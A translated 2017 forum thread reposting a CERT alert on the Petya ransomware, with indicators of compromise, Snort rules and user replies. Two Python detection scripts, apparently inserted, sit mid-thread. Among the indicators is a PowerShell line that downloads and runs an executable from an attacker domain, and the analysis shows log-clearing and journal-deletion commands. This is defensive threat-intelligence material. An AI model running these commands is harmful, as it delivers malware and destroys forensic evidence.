Virus

Post by Amone » Wed 28 Jun 2017 09:44

FYI, the description of the new virus and what it does.

Hello everybody,

FYI.

___________________________________________________________________

PETYA ALERT - ALLIACERT JUNE 2017
 
You will find below more details about the attack, and the alert will be kept up-to-date.
 
Summary [Updated]
Malware name: Petya / Mischa / Petrwrap
Infection and propagation: The ETERNALBLUE exploit is in use within this ransomware. All Microsoft Windows versions that were vulnerable to WannaCry and not patched with MS17-010 are targeted by this attack. It combines both a client-side attack (CVE-2017-0199) and a network-based threat (MS17-010).
The ransomware could use pass-the-hash techniques to attack computers in the same Active Directory or cloned machines.
Spam and spear-phishing may be used.
The ransomware encrypts MFT (Master File Tree) tables for NTFS partitions and overwrites the MBR (Master Boot Record) with a custom bootloader that shows a ransom note and prevents victims from booting their computer.
The ransomware displays a text demanding $300 worth of Bitcoin.
Classification [Updated]
 
Online dynamic analysis:
 
Copies itself to C:\Windows\
Drops a PE file to C:\Windows\dllhost.dat
Attempts to connect to port 445 and initiate an SMB handshake, probably attempting to use ETERNALBLUE to spread itself.
Creates a scheduled task file to induce a reboot at a specified time. Creates it using schtasks
Uses wevtutil.exe to clear Setup, System, Security, and Application logs
Uses fsutil.exe to delete the update sequence number (USN) change journal, which provides a log of all changes made to files on the volume, in this case "C:".
 
Static analysis
Targets the following file extensions for encryption: .3ds, .7z, .accdb, .ai, .asp, .aspx, .avhd, .back, .bak, .c, .cfg, .conf, .cpp, .cs, .ctl, .dbf, .disk, .djvu, .doc, .docx, .dwg, .eml, .fdb, .gz, .h, .hdd, .kdbx, .mail, .mdb, .msg, .nrg, .ora, .ost, .ova, .ovf, .pdf, .php, .pmf, .ppt, .pptx, .pst, .pvi, .py, .pyc, .rar, .rtf, .sln, .sql, .tar, .vbox, .vbs, .vcb, .vdi, .vfd, .vmc, .vmdk, .vmsd, .vmx, .vsdx, .vsv, .work, .xls, .xlsx, .xvd, .zip
Contains two embedded PE files.
Recommendations [Updated]
 
Ensure that all versions of Windows are patched up to the latest currently available.
Disable the outdated SMBv1 protocol.
Isolate unpatched systems from the larger network
Kill switch [New]
 
The following block has been effective in stopping the spread of infection via PsExec and WMI in some environments. Please assess the risk of implementation in your environment before proceeding:
Block C:\Windows\perfc.dat from writing/executing for rundll32 import
{
  exe: "C:\Windows\SysWOW64\rundll32.exe",
  username: "NT AUTHORITY\SYSTEM",
  ppid: 55140,
  cmdline: [
    "C:\Windows\System32\rundll32.exe",
    "C:\Windows\perfc.dat,#1",
    "10",
    "<credentials here in clear-text>"
  ]
}
 
Indicators of Compromise (IoC) [Updated]
 Type Indicator
file Петя.apx
file myguy.xls
file myguy.exe
file Order-20061017.doc
file petwrap.exe
email wowsmith123456@posteo.net
email iva76y3pr@outlook.com 
email carmellar4hegp@outlook.com
email amanda44i8sq@outlook.com 
Bitcoin wallet 1Mz7153HMuxXTuR2R1t78mGSdzaAtNbBWX
url  french-cooking.com
url  sundanders.online
url  casconut.xyz
url  blumbeerg.xyz  
url  insurepol.in
url  whitefoam.org.uk
url  xfusion.co.uk  
url  affliates.in  
url  chyporus.in
url  coffeinoffice.xyz  
url  dantan.club  
url  kababmachatu.xyz  
url  damodot.xyz 
url  ballotvize.xyz
url h11p://84.200.16.242/myguy.xls
url https://yadi.sk/d/S0-ZhPY53KWc84
url https://yadi.sk/d/Zpkm88sp3KWc8v
IP 111.90.139.247
IP  95.141.115.108
IP  185.165.29.78
IP 84.200.16.242
FilePath dllhost.dat
PowerShell powershell.exe -WindowStyle Hidden (New-Object System.Net.WebClient).DownloadFile('h11p://french-cooking.com/myguy.exe', '%APPDATA%\10807.exe');" (PID: 2588, Additional Context: ( System.Net.WebClient).DownloadFile('h11p://french-cooking.com/myguy.exe', '%APPDATA%\10807.exe') ;)
PowerShell 10807.exe %APPDATA%\10807.exe" "
Mutex 027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745
Mutex 64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1
Mutex f8dbabdfa03068130c277ce49c60e35c029ff29d9e3c74c362521f3fb02670d5 (signed PSEXEC.EXE)
Mutex 752e5cf9e47509ce51382c88fc4d7e53b5ca44ba22a94063f95222634b362ca5
Mutex eae9771e2eeb7ea3c6059485da39e77b8c0c369232f01334954fbac1c186c998 (32-bit EXE)
FileHash 64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1
FileHash FE2E5D0543B4C8769E401EC216D78A5A3547DFD426FD47E097DF04A5F7D6D206
FileHash EE29B9C01318A1E23836B949942DB14D4811246FDAE2F41DF9F0DCD922C63BC6
FileHash 34f917aaba5684fbe56d3c57d48ef2a1aa7cf06d
FileHash 101CC1CB56C407D5B9149F2C3B8523350D23BA84
FileHash 736752744122A0B5EE4B95DDAD634DD225DC0F73
FileHash 8a241cfcc23dc740e1fadc7f2df3965e
FileHash c8e4829dcba8b288bd0ed75717214db6 
FileHash 10b2d20a3c36fe6a5bf6f3b15149c3d1
FileHash 34da44570eb8c7a5038370f553eb3899  
FileHash 71b6a493388e7d0b40c83ce903bc6b04
FileHash 415FE69BF32634CA98FA07633F4118E1
FileHash 0487382A4DAF8EB9660F1C67E30F8B25
FileHash bec678164cedea578a7aff4589018fa41551c27f
FileHash a809a63bc5e31670ff117d838522dec433f74bee
FileHash d5bf3f100e7dbcc434d7c58ebf64052329a60fc2
FileHash aba7aa41057c8a6b184ba5776c20f7e8fc97c657
FileHash 0ff07caedad54c9b65e5873ac2d81b3126754aac
FileHash 51eafbb626103765d3aedfd098b94d0e77de1196
FileHash 078de2dc59ce59f503c63bd61f1ef8353dc7cf5f
FileHash 7ca37b86f4acc702f108449c391dd2485b5ca18c
FileHash 2bc182f04b935c7e358ed9c9e6df09ae6af47168
FileHash 1b83c00143a1bb2bf16b46c01f36d53fb66f82b5
FileHash 82920a2ad0138a2a8efc744ae5849c6dde6b435d
FileHash 027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745
FileHash  5d91f2c2ed8d83739522eb234452f230ebf4b9e1f8cd8d097d99c583e85695aa
FileHash  f2dcaf0636a58a2b5a063b40571a12b09f1623c9172cfc6ddb4dc46a51ede7f0
FileHash  9717cfdc2d023812dbc84a941674eb23a2a8ef06
FileHash  7e37ab34ecdcc3e77e24522ddfd4852d
FileHash  02ef73bd2458627ed7b397ec26ee2de2e92c71a0e7588f78734761d8edbdcd9f
FileHash  17dacedb6f0379a65160d73c0ae3aa1f03465ae75cb6ae754c7dcb3017af1fbd
FileHash  56be65c707816da80df0e66bf82506e88996fc398c0b0f0a55af920d7506cca8
FileHash  9288fb8e96d419586fc8c595dd95353d48e8a060
FileHash  a1d5895f85751dfe67d19cccb51b051a
FileHash  e285b6ce047015943e685e6638bd837e
FileHash  ccaeb42bbcaa53b583e1bbb4f3e883c7
FileHash  e595c02185d8e12be347915865270cca

 
 
OPEN SNORT Alerts [New]
 
alert tcp any any -> $HOME_NET 445 (msg: "[PT Open] Unimplemented Trans2 Sub-Command code. Possible ETERNALBLUE (WannaCry, Petya) tool"; flow: to_server, established; content: "|FF|SMB2|00 00 00 00|"; depth: 9; offset: 4; byte_test: 2, >, 0x0008, 52, relative, little; pcre: "/\xFFSMB2\x00\x00\x00\x00.{52}(?:\x04|\x09|\x0A|\x0B|\x0C|\x0E|\x11)\x00/"; flowbits: set, SMB.Trans2.SubCommand.Unimplemented; reference: url, msdn.microsoft.com/en-us/library/ee441654.aspx; classtype: attempted-admin; sid: 10001254; rev: 2;)

alert tcp any any -> $HOME_NET 445 (msg: "[PT Open] ETERNALBLUE (WannaCry, Petya) SMB MS Windows RCE"; flow: to_server, established; content: "|FF|SMB3|00 00 00 00|"; depth: 9; offset: 4; flowbits: isset, SMB.Trans2.SubCommand.Unimplemented.Code0E; threshold: type limit, track by_src, seconds 60, count 1; reference: cve, 2017-0144; classtype: attempted-admin; sid: 10001255; rev: 3;)

alert tcp any any -> $HOME_NET 445 (msg: "[PT Open] Trans2 Sub-Command 0x0E. Likely ETERNALBLUE (WannaCry, Petya) tool"; flow: to_server, established; content: "|FF|SMB2|00 00 00 00|"; depth: 9; offset: 4; content: "|0E 00|"; distance: 52; within: 2; flowbits: set, SMB.Trans2.SubCommand.Unimplemented.Code0E; reference: url, msdn.microsoft.com/en-us/library/ee441654.aspx; classtype: attempted-admin; sid: 10001256; rev: 2;)

alert tcp any any -> $HOME_NET 445 (msg: "[PT Open] Petya ransomware perfc.dat component"; flow: to_server, established, no_stream; content: "|fe 53 4d 42|"; offset: 4; depth: 4; content: "|05 00|"; offset: 16; depth: 2; byte_jump: 2, 112, little, from_beginning, post_offset 4; content: "|70 00 65 00 72 00 66 00 63 00 2e 00 64 00 61 00 74 00|"; distance:0; classtype:suspicious-filename-detect; sid: 10001443; rev: 1;)

alert tcp any any -> $HOME_NET 445 (msg:"[PT Open] SMB2 Create PSEXESVC.EXE"; flow:to_server, established, no_stream; content: "|fe 53 4d 42|"; offset: 4; depth: 4; content: "|05 00|"; offset: 16; depth: 2; byte_jump: 2, 112, little, from_beginning, post_offset 4; content:"|50 00 53 00 45 00 58 00 45 00 53 00 56 00 43 00 2e 00 45 00 58 00 45|"; distance:0; classtype:suspicious-filename-detect; sid: 10001444; rev:1;)
alert tcp any any -> any 445 (msg:"ET CURRENT_EVENTS ETERNALBLUE Exploit M2 MS17-010"; flow:established,to_server; content:"|8000a80000000000000000000000000000000000ffff000000000000ffff0000000000000000000000000000000000000000000000f1dfff000000000000000020f0dfff00f1dfffffffffff600004100000000080efdfff|"; reference:cve,2017-0143; classtype:attempted-admin; sid:2024297; rev:1;)
alert any $EXTERNAL_NET any -> $HOME_NET any (msg: "[WINDOWS-MALWARE] Petya payload delivery SHA256 hash detected - Open source"; meta_content: "%sagan%",64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1,027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745,027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745,64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1,027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745,fe2e5d0543b4c8769e401ec216d78a5a3547dfd426fd47e097df04a5f7d6d206,ee29b9c01318a1e23836b949942db14d4811246fdae2f41df9f0dcd922c63bc6,17dacedb6f0379a65160d73c0ae3aa1f03465ae75cb6ae754c7dcb3017af1fbd,17dacedb6f0379a65160d73c0ae3aa1f03465ae75cb6ae754c7dcb3017af1fbd,e5c643f1d8ecc0fd739d0bbe4a1c6c7de2601d86ab0fff74fd89c40908654be5; meta_nocase; classtype: trojan-activity; reference: url,CERT; reference: url,isc.sans.edu/forums/diary/Widescale+Petya+variant+ransomware+attack+noted/22560/; sid:5003121; rev:1;)
alert any $EXTERNAL_NET any -> $HOME_NET any (msg: "[WINDOWS-MALWARE] Petya payload delivery SHA1 hash detected - Open source"; meta_content: "%sagan%",34f917aaba5684fbe56d3c57d48ef2a1aa7cf06d,027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745,101cc1cb56c407d5b9149f2c3b8523350d23ba84,a809a63bc5e31670ff117d838522dec433f74bee,d5bf3f100e7dbcc434d7c58ebf64052329a60fc2,aba7aa41057c8a6b184ba5776c20f7e8fc97c657,bec678164cedea578a7aff4589018fa41551c27f,078de2dc59ce59f503c63bd61f1ef8353dc7cf5f,0ff07caedad54c9b65e5873ac2d81b3126754aac,51eafbb626103765d3aedfd098b94d0e77de1196,82920a2ad0138a2a8efc744ae5849c6dde6b435d,1b83c00143a1bb2bf16b46c01f36d53fb66f82b5,7ca37b86f4acc702f108449c391dd2485b5ca18c,2bc182f04b935c7e358ed9c9e6df09ae6af47168,9288fb8e96d419586fc8c595dd95353d48e8a060,736752744122a0b5ee4b95ddad634dd225dc0f73,9288fb8e96d419586fc8c595dd95353d48e8a060,dd52fcc042a44a2af9e43c15a8e520b54128cdc8; meta_nocase; classtype: trojan-activity; reference: url,CERT; reference: url,isc.sans.edu/forums/diary/Widescale+Petya+variant+ransomware+attack+noted/22560/; sid:5003122; rev:1;)
alert any $EXTERNAL_NET any -> $HOME_NET any (msg: "[WINDOWS-MALWARE] Petya payload delivery MD5 hash detected - Open source"; meta_content: "%sagan%",71b6a493388e7d0b40c83ce903bc6b04,415fe69bf32634ca98fa07633f4118e1,0487382a4daf8eb9660f1c67e30f8b25,a1d5895f85751dfe67d19cccb51b051a; meta_nocase; classtype: trojan-activity; reference: url,CERT; reference: url,isc.sans.edu/forums/diary/Widescale+Petya+variant+ransomware+attack+noted/22560/; sid:5003123; rev:1;)
alert any $EXTERNAL_NET any -> $HOME_NET any (msg: "[WINDOWS-MALWARE] Petya detected by filename - Open source"; meta_content: "%sagan%",myguy.xls,myguy.exe,BCA9D6.EXE,Order-20062017.doc,myguy.xls.hta; meta_nocase; classtype: trojan-activity; reference: url,CERT; reference: url,isc.sans.edu/forums/diary/Widescale+Petya+variant+ransomware+attack+noted/22560/; sid:5003124; rev:1;)
Even if the morrow is barren of promises,
Nothing shall forestall my return
To become the dew that quenches the lands,
To spare the sands, the seas, the skies
I offer thee this silent sacrifice.
Amone
Members

Posts: 1560
Joined: Mon 29 Sep 2014 20:27
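The behaviours listed under "Online dynamic analysis" in the alert above (the rundll32 launch of perfc.dat,#1, wevtutil clearing the event logs, fsutil deleting the USN journal, schtasks scheduling the reboot) are what a SOC can actually hunt for in process-creation telemetry. The Python below is an added example, not part of the alert or of this post: it scans constructed Sysmon-style process-creation records, flags those four behaviours, groups the hits under the rundll32 process that spawned them, and redacts the clear-text credentials that the alert's process-tree excerpt shows being passed on the command line. The tab-separated record layout, the exact schtasks/shutdown command line, and the assumption that everything after the numeric reboot-delay argument is credential material are mine, not the alert's.

```python
"""Triage of process-creation records for the post-infection behaviour the alert lists.

Added example, not part of the alert or the forum post; the sample records are constructed.
"""
import re
from dataclasses import dataclass
from typing import Dict, Iterator, List, Set, Tuple

# Constructed sample in an assumed "pid<TAB>ppid<TAB>image<TAB>cmdline" export layout.
# The schtasks/shutdown command line and the clear-text credential argument after the
# reboot delay are assumptions drawn from the alert's description and process-tree excerpt.
SAMPLE_LOG = """\
2588\t1880\tC:\\Windows\\System32\\rundll32.exe\tC:\\Windows\\System32\\rundll32.exe C:\\Windows\\perfc.dat,#1 10 "CORP\\svc_backup:Summer2017!"
2604\t2588\tC:\\Windows\\System32\\cmd.exe\tcmd.exe /c wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D C:
2612\t2588\tC:\\Windows\\System32\\schtasks.exe\tschtasks /Create /SC once /TN "" /TR "C:\\Windows\\system32\\shutdown.exe /r /f" /ST 10:30
2700\t1880\tC:\\Windows\\System32\\rundll32.exe\trundll32.exe C:\\Windows\\System32\\shell32.dll,Control_RunDLL
3001\t1880\tC:\\Windows\\System32\\wevtutil.exe\twevtutil qe Security /c:5
"""

# One regex per behaviour from the alert's dynamic analysis; matched case-insensitively.
RULES: List[Tuple[str, "re.Pattern"]] = [
    ("petya_rundll32_perfc", re.compile(r"rundll32(\.exe)?\s+\S*perfc(\.dat|\.dll)?,#1\b", re.I)),
    ("wevtutil_clear_log", re.compile(r"wevtutil(\.exe)?\s+cl\s+(setup|system|security|application)\b", re.I)),
    ("fsutil_usn_deletejournal", re.compile(r"fsutil(\.exe)?\s+usn\s+deletejournal\b", re.I)),
    ("schtasks_scheduled_reboot", re.compile(r"schtasks(\.exe)?\s+/create\b.*shutdown(\.exe)?\s+/r\b", re.I)),
]

# Everything after "perfc.dat,#1 <delay>" is treated as credential material (assumption).
CRED_ARGS = re.compile(r"(perfc(?:\.dat|\.dll)?,#1\s+\d+)\s+.+$", re.I)


@dataclass(frozen=True)
class Finding:
    pid: int
    ppid: int
    rule: str
    cmdline: str  # already redacted


def redact(cmdline: str) -> str:
    """Strip clear-text credentials from the perfc.dat,#1 launch before a finding is stored."""
    return CRED_ARGS.sub(r"\1 <redacted>", cmdline)


def parse(log: str) -> Iterator[Tuple[int, int, str, str]]:
    """Yield (pid, ppid, image, cmdline) from the assumed tab-separated layout."""
    for line in log.splitlines():
        if not line.strip():
            continue
        pid, ppid, image, cmdline = line.split("\t", 3)
        yield int(pid), int(ppid), image, cmdline


def triage(log: str) -> List[Finding]:
    """Return one Finding per (record, rule) match, with credentials redacted."""
    findings = []
    for pid, ppid, _image, cmdline in parse(log):
        for name, pattern in RULES:
            if pattern.search(cmdline):
                findings.append(Finding(pid, ppid, name, redact(cmdline)))
    return findings


def attribute_to_chain(findings: List[Finding]) -> Dict[int, Set[str]]:
    """Group hits under the rundll32 perfc.dat process that spawned them (its pid is the key).

    Hits whose parent is not a known perfc.dat process are collected under key -1 so they
    are not silently lost; they still deserve a look."""
    roots = {f.pid for f in findings if f.rule == "petya_rundll32_perfc"}
    chains: Dict[int, Set[str]] = {pid: set() for pid in roots}
    for f in findings:
        root = f.pid if f.pid in roots else (f.ppid if f.ppid in roots else -1)
        chains.setdefault(root, set()).add(f.rule)
    return chains


if __name__ == "__main__":
    hits = triage(SAMPLE_LOG)
    for hit in hits:
        print(f"pid={hit.pid} ppid={hit.ppid} {hit.rule}: {hit.cmdline}")
    for root, rules in attribute_to_chain(hits).items():
        print(f"chain rooted at pid {root}: {sorted(rules)}")
```

Running it prints four hits, all attributed to the rundll32 process with pid 2588, and the credential string from the first record never appears in the output. The rule list deliberately ignores the unrelated rundll32 and wevtutil query records, which is the usual false-positive source when people grep for tool names instead of the specific arguments the alert describes.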

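The first three Snort rules in the alert key on one byte position: the Trans2 subcommand code 52 bytes past the end of the "|FF|SMB2|00 00 00 00|" match, which is payload offset 65, i.e. Setup[0] of an SMB_COM_TRANSACTION2 request after the 4-byte NetBIOS header, the 32-byte SMB header, WordCount and the 28 bytes of Trans2 words. The rules then chain a flowbit from a 0x0E (TRANS2_SESSION_SETUP, never implemented by Windows) request to a following NT Trans ("|FF|SMB3") request from the same source. The Python below is an added example, not part of the alert: it builds minimal constructed SMB1 frames (test input, not exploit traffic), reads the subcommand at the same offset the rules use, and reproduces the flowbit logic with per-source state. The rules' "threshold: type limit, count 1, seconds 60" is reduced to "alert once per source"; the 60-second window is not modelled.

```python
"""Detection logic of the Trans2 / NT Trans Snort rules, re-expressed over constructed SMB1 frames.

Added example, not part of the alert; the packets built here are minimal test input, not exploit traffic.
"""
import struct
from typing import List, Optional, Set

SMB1_MAGIC = b"\xffSMB"
SMB_COM_TRANSACTION2 = 0x32   # ASCII '2', hence "|FF|SMB2" in the rules
SMB_COM_NT_TRANSACT = 0x33    # ASCII '3', hence "|FF|SMB3"
# Trans2 subcommand codes the first rule's pcre treats as unimplemented; 0x0E is TRANS2_SESSION_SETUP.
UNIMPLEMENTED_TRANS2 = {0x04, 0x09, 0x0A, 0x0B, 0x0C, 0x0E, 0x11}
TRANS2_SESSION_SETUP = 0x0E
# 4 (NetBIOS) + 32 (SMB header) + 1 (WordCount) + 28 (Trans2 words before Setup) == 13 + 52 in the rules.
SETUP0_OFFSET = 65


def build_smb1(command: int, body: bytes) -> bytes:
    """NetBIOS session header + 32-byte SMB1 header (status, flags and ids zeroed) + body."""
    header = SMB1_MAGIC + bytes([command]) + b"\x00" * 27
    msg = header + body
    return b"\x00" + len(msg).to_bytes(3, "big") + msg


def build_trans2_request(subcommand: int, param_len: int = 0, data_len: int = 0) -> bytes:
    """Minimal SMB_COM_TRANSACTION2 request with SetupCount=1 and Setup[0]=subcommand."""
    words = struct.pack(
        "<HHHHBBHIHHHHHBBH",
        param_len, data_len,        # TotalParameterCount, TotalDataCount
        0, 0xFFFF,                  # MaxParameterCount, MaxDataCount
        0, 0, 0, 0, 0,              # MaxSetupCount, Reserved1, Flags, Timeout, Reserved2
        param_len, 0, data_len, 0,  # ParameterCount, ParameterOffset, DataCount, DataOffset
        1, 0, subcommand,           # SetupCount, Reserved3, Setup[0]
    )
    # WordCount=15 (14 fixed words + 1 setup word), ByteCount=0
    return build_smb1(SMB_COM_TRANSACTION2, bytes([15]) + words + struct.pack("<H", 0))


def smb_command(payload: bytes) -> Optional[int]:
    """SMB1 command byte (payload offset 8), or None if this is not an SMB1 frame."""
    if len(payload) < 9 or payload[4:8] != SMB1_MAGIC:
        return None
    return payload[8]


def trans2_subcommand(payload: bytes) -> Optional[int]:
    """Setup[0] of a TRANS2 request, read where the rules' byte_test/pcre look; None otherwise."""
    if smb_command(payload) != SMB_COM_TRANSACTION2 or len(payload) < SETUP0_OFFSET + 2:
        return None
    word_count, setup_count = payload[36], payload[63]
    if word_count < 15 or setup_count < 1:
        return None
    return struct.unpack_from("<H", payload, SETUP0_OFFSET)[0]


class EternalBlueDetector:
    """Per-source state mirroring the rules' flowbit: set on Trans2 0x0E, checked on the next NT Trans."""

    def __init__(self) -> None:
        self.session_setup_seen: Set[str] = set()  # sources that sent TRANS2_SESSION_SETUP
        self.already_alerted: Set[str] = set()     # 'threshold: type limit, count 1' without the 60 s window

    def inspect(self, src: str, payload: bytes) -> List[str]:
        alerts: List[str] = []
        sub = trans2_subcommand(payload)
        if sub in UNIMPLEMENTED_TRANS2:
            alerts.append("unimplemented Trans2 subcommand 0x%02X from %s" % (sub, src))
            if sub == TRANS2_SESSION_SETUP:
                self.session_setup_seen.add(src)
        elif (smb_command(payload) == SMB_COM_NT_TRANSACT
              and src in self.session_setup_seen
              and src not in self.already_alerted):
            self.already_alerted.add(src)
            alerts.append("ETERNALBLUE pattern: NT Trans after Trans2 0x0E from %s" % src)
        return alerts


if __name__ == "__main__":
    det = EternalBlueDetector()
    traffic = [
        ("10.0.0.5", build_trans2_request(0x01)),                      # FIND_FIRST2: benign
        ("10.0.0.5", build_trans2_request(TRANS2_SESSION_SETUP)),      # never implemented by Windows
        ("10.0.0.5", build_smb1(SMB_COM_NT_TRANSACT, b"\x00\x00\x00")),
    ]
    for src, pkt in traffic:
        for line in det.inspect(src, pkt):
            print(line)
```

Note what this does and does not prove: the offset logic is only valid for unfragmented SMB1 over TCP 445 with the NetBIOS session header present, exactly as the rules assume (`flow: to_server, established`), and a Trans2 0x0E on its own is already suspicious because no Windows server implements it, which is why the first and third rules fire before the flowbit chain completes.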
Re: Virus

Post by Bakaa » Wed 28 Jun 2017 13:51

In short, and in French?
Bakaa
Apply

Posts: 126
Joined: Mon 16 Jan 2017 20:52

Re: Virus

Post by warnol » Wed 28 Jun 2017 14:13

In short, same attack as at the start of the month with WannaCry. If you have Windows, update it; if you have another OS, who cares.

Otherwise, don't open the attachments in emails that promise you fortunes and a big dick...
warnol
Site administrator

Posts: 628
Joined: Thu 6 Feb 2014 00:52

Re: Virus

Post by Ryllyah » Wed 28 Jun 2017 14:16

Amones, don't you work at BNP? I saw that their Real Estate branch had been hit.
Ryllyah
Members

Posts: 861
Joined: Tue 13 May 2014 12:56

Re: Virus

Post by Ophay » Wed 28 Jun 2017 14:59

Well, if it's Amones who handles security.... :lol:
Ophay
Members

Posts: 792
Joined: Sat 17 May 2014 22:03

Re: Virus

Post by Amone » Wed 28 Jun 2017 15:04

Yep, Real Estate are in deep shit, 4000 users are on technical unemployment lol ^^
Amone
Members

Posts: 1560
Joined: Mon 29 Sep 2014 20:27

Re: Virus

Post by Obscurus » Wed 28 Jun 2017 16:41

At work we caught something that encrypted files to .nm4, nasty stuff :p
Obscurus
Members

Posts: 123
Joined: Tue 3 Jan 2017 09:33

Re: Virus

Post by Bakaa » Wed 28 Jun 2017 17:08

Obscurus wrote: At work we caught something that encrypted files to .nm4, nasty stuff :p


They sure remember it, two weeks of work at work!
Bakaa
Apply

Posts: 126
Joined: Mon 16 Jan 2017 20:52

Re: Virus

Post by Frize » Wed 28 Jun 2017 17:38

WannaCry exploits a Windows flaw, not phishing ^^
Frize
Apply

Posts: 43
Joined: Wed 17 May 2017 22:30

